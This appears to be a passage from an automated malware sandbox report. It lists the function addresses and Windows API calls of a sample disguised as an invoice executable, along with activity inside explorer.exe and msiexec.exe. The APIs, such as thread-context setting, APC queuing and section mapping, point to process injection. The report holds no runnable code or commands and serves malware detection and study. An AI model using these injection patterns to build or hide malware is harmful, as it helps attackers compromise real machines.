          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A263E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,7_2_00A263E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04732C70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732C60 NtCreateKey,LdrInitializeThunk,7_2_04732C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04732CA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04732D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04732DF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732DD0 NtDelayExecution,LdrInitializeThunk,7_2_04732DD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04732EA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732F30 NtCreateSection,LdrInitializeThunk,7_2_04732F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732FE0 NtCreateFile,LdrInitializeThunk,7_2_04732FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732AD0 NtReadFile,LdrInitializeThunk,7_2_04732AD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732B60 NtClose,LdrInitializeThunk,7_2_04732B60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047335C0 NtCreateMutant,LdrInitializeThunk,7_2_047335C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04734650 NtSuspendThread,7_2_04734650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04734340 NtSetContextThread,7_2_04734340
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732C00 NtQueryInformationProcess,7_2_04732C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732CF0 NtOpenProcess,7_2_04732CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732CC0 NtQueryVirtualMemory,7_2_04732CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732D30 NtUnmapViewOfSection,7_2_04732D30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732D00 NtSetInformationFile,7_2_04732D00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732DB0 NtEnumerateKey,7_2_04732DB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732E30 NtWriteVirtualMemory,7_2_04732E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732EE0 NtQueueApcThread,7_2_04732EE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732E80 NtReadVirtualMemory,7_2_04732E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732F60 NtCreateProcessEx,7_2_04732F60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732FB0 NtResumeThread,7_2_04732FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732FA0 NtQuerySection,7_2_04732FA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732F90 NtProtectVirtualMemory,7_2_04732F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732AF0 NtWriteFile,7_2_04732AF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732AB0 NtWaitForSingleObject,7_2_04732AB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732BF0 NtAllocateVirtualMemory,7_2_04732BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732BE0 NtQueryValueKey,7_2_04732BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732BA0 NtEnumerateValueKey,7_2_04732BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04732B80 NtQueryInformationFile,7_2_04732B80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04733010 NtOpenDirectoryObject,7_2_04733010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04733090 NtSetValueKey,7_2_04733090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04733D70 NtOpenThread,7_2_04733D70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04733D10 NtOpenProcessToken,7_2_04733D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047339B0 NtGetContextThread,7_2_047339B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA360 NtCreateFile,7_2_005EA360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA410 NtReadFile,7_2_005EA410
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA490 NtClose,7_2_005EA490
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA35A NtCreateFile,7_2_005EA35A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA45A NtReadFile,7_2_005EA45A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA40A NtReadFile,7_2_005EA40A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,7_2_0460A036
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04609BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_04609BAF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460A042 NtQueryInformationProcess,7_2_0460A042
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04609BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_04609BB2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_00E8D4440_2_00E8D444
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_04A559C00_2_04A559C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_04A511980_2_04A51198
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_04A51AC80_2_04A51AC8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2C3F00_2_0AB2C3F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2F8390_2_0AB2F839
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2F8480_2_0AB2F848
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2EFD80_2_0AB2EFD8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2C3E00_2_0AB2C3E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB276280_2_0AB27628
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB276180_2_0AB27618
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2F4100_2_0AB2F410
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 0_2_0AB2F4030_2_0AB2F403
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041DAF34_2_0041DAF3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041C3EA4_2_0041C3EA
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041E56E4_2_0041E56E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00409E5B4_2_00409E5B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00409E604_2_00409E60
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041DF724_2_0041DF72
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041E7D24_2_0041E7D2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010801004_2_01080100
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112A1184_2_0112A118
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011181584_2_01118158
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011441A24_2_011441A2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011501AA4_2_011501AA
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011481CC4_2_011481CC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011220004_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114A3524_2_0114A352
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011503E64_2_011503E6
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E3F04_2_0109E3F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011302744_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011102C04_2_011102C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010905354_2_01090535
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011505914_2_01150591
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011344204_2_01134420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011424464_2_01142446
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113E4F64_2_0113E4F6
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B47504_2_010B4750
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010907704_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108C7C04_2_0108C7C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AC6E04_2_010AC6E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A69624_2_010A6962
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A04_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0115A9A64_2_0115A9A6
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109A8404_2_0109A840
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010928404_2_01092840
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010768B84_2_010768B8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE8F04_2_010BE8F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114AB404_2_0114AB40
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01146BD74_2_01146BD7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA804_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109AD004_2_0109AD00
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112CD1F4_2_0112CD1F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A8DBF4_2_010A8DBF
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108ADE04_2_0108ADE0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090C004_2_01090C00
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130CB54_2_01130CB5
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080CF24_2_01080CF2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01132F304_2_01132F30
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D2F284_2_010D2F28
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B0F304_2_010B0F30
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01104F404_2_01104F40
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110EFA04_2_0110EFA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01082FC84_2_01082FC8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109CFE04_2_0109CFE0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114EE264_2_0114EE26
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090E594_2_01090E59
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114CE934_2_0114CE93
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2E904_2_010A2E90
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114EEDB4_2_0114EEDB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C516C4_2_010C516C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107F1724_2_0107F172
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0115B16B4_2_0115B16B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109B1B04_2_0109B1B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010970C04_2_010970C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113F0CC4_2_0113F0CC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114F0E04_2_0114F0E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011470E94_2_011470E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114132D4_2_0114132D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107D34C4_2_0107D34C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D739A4_2_010D739A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010952A04_2_010952A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AB2C04_2_010AB2C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011312ED4_2_011312ED
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011475714_2_01147571
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112D5B04_2_0112D5B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114F43F4_2_0114F43F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010814604_2_01081460
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114F7B04_2_0114F7B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D56304_2_010D5630
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011416CC4_2_011416CC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011259104_2_01125910
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010999504_2_01099950
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AB9504_2_010AB950
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FD8004_2_010FD800
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010938E04_2_010938E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114FB764_2_0114FB76
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AFB804_2_010AFB80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01105BF04_2_01105BF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010CDBF94_2_010CDBF9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01147A464_2_01147A46
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114FA494_2_0114FA49
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01103A6C4_2_01103A6C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D5AA04_2_010D5AA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01131AA34_2_01131AA3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112DAAC4_2_0112DAAC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113DAC64_2_0113DAC6
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01093D404_2_01093D40
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01141D5A4_2_01141D5A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01147D734_2_01147D73
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AFDC04_2_010AFDC0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01109C324_2_01109C32
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114FCF24_2_0114FCF2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114FF094_2_0114FF09
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01091F924_2_01091F92
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114FFB14_2_0114FFB1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01099EB04_2_01099EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E32326_2_0E2E3232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2DDB306_2_0E2DDB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2DDB326_2_0E2DDB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E20366_2_0E2E2036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2D90826_2_0E2D9082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2DAD026_2_0E2DAD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E09126_2_0E2E0912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E65CD6_2_0E2E65CD
          Source: C:\Windows\explorer.exeCode function: 6_2_104D30366_2_104D3036
          Source: C:\Windows\explorer.exeCode function: 6_2_104CA0826_2_104CA082
          Source: C:\Windows\explorer.exeCode function: 6_2_104CBD026_2_104CBD02
          Source: C:\Windows\explorer.exeCode function: 6_2_104D19126_2_104D1912
          Source: C:\Windows\explorer.exeCode function: 6_2_104D75CD6_2_104D75CD
          Source: C:\Windows\explorer.exeCode function: 6_2_104D42326_2_104D4232
          Source: C:\Windows\explorer.exeCode function: 6_2_104CEB306_2_104CEB30
          Source: C:\Windows\explorer.exeCode function: 6_2_104CEB326_2_104CEB32
          Source: C:\Windows\explorer.exeCode function: 6_2_10F9F2326_2_10F9F232
          Source: C:\Windows\explorer.exeCode function: 6_2_10F950826_2_10F95082
          Source: C:\Windows\explorer.exeCode function: 6_2_10F9E0366_2_10F9E036
          Source: C:\Windows\explorer.exeCode function: 6_2_10FA25CD6_2_10FA25CD
          Source: C:\Windows\explorer.exeCode function: 6_2_10F99B306_2_10F99B30
          Source: C:\Windows\explorer.exeCode function: 6_2_10F99B326_2_10F99B32
          Source: C:\Windows\explorer.exeCode function: 6_2_10F9C9126_2_10F9C912
          Source: C:\Windows\explorer.exeCode function: 6_2_10F96D026_2_10F96D02
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A263E37_2_00A263E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B24467_2_047B2446
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047A44207_2_047A4420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047AE4F67_2_047AE4F6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047005357_2_04700535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047C05917_2_047C0591
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0471C6E07_2_0471C6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047007707_2_04700770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047247507_2_04724750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FC7C07_2_046FC7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047920007_2_04792000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047881587_2_04788158
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0479A1187_2_0479A118
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F01007_2_046F0100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B81CC7_2_047B81CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047C01AA7_2_047C01AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B41A27_2_047B41A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047A02747_2_047A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047802C07_2_047802C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BA3527_2_047BA352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470E3F07_2_0470E3F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047C03E67_2_047C03E6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700C007_2_04700C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F0CF27_2_046F0CF2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047A0CB57_2_047A0CB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0479CD1F7_2_0479CD1F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470AD007_2_0470AD00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FADE07_2_046FADE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04718DBF7_2_04718DBF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700E597_2_04700E59
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BEE267_2_047BEE26
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BEEDB7_2_047BEEDB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04712E907_2_04712E90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BCE937_2_047BCE93
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04774F407_2_04774F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04720F307_2_04720F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047A2F307_2_047A2F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04742F287_2_04742F28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470CFE07_2_0470CFE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F2FC87_2_046F2FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477EFA07_2_0477EFA0
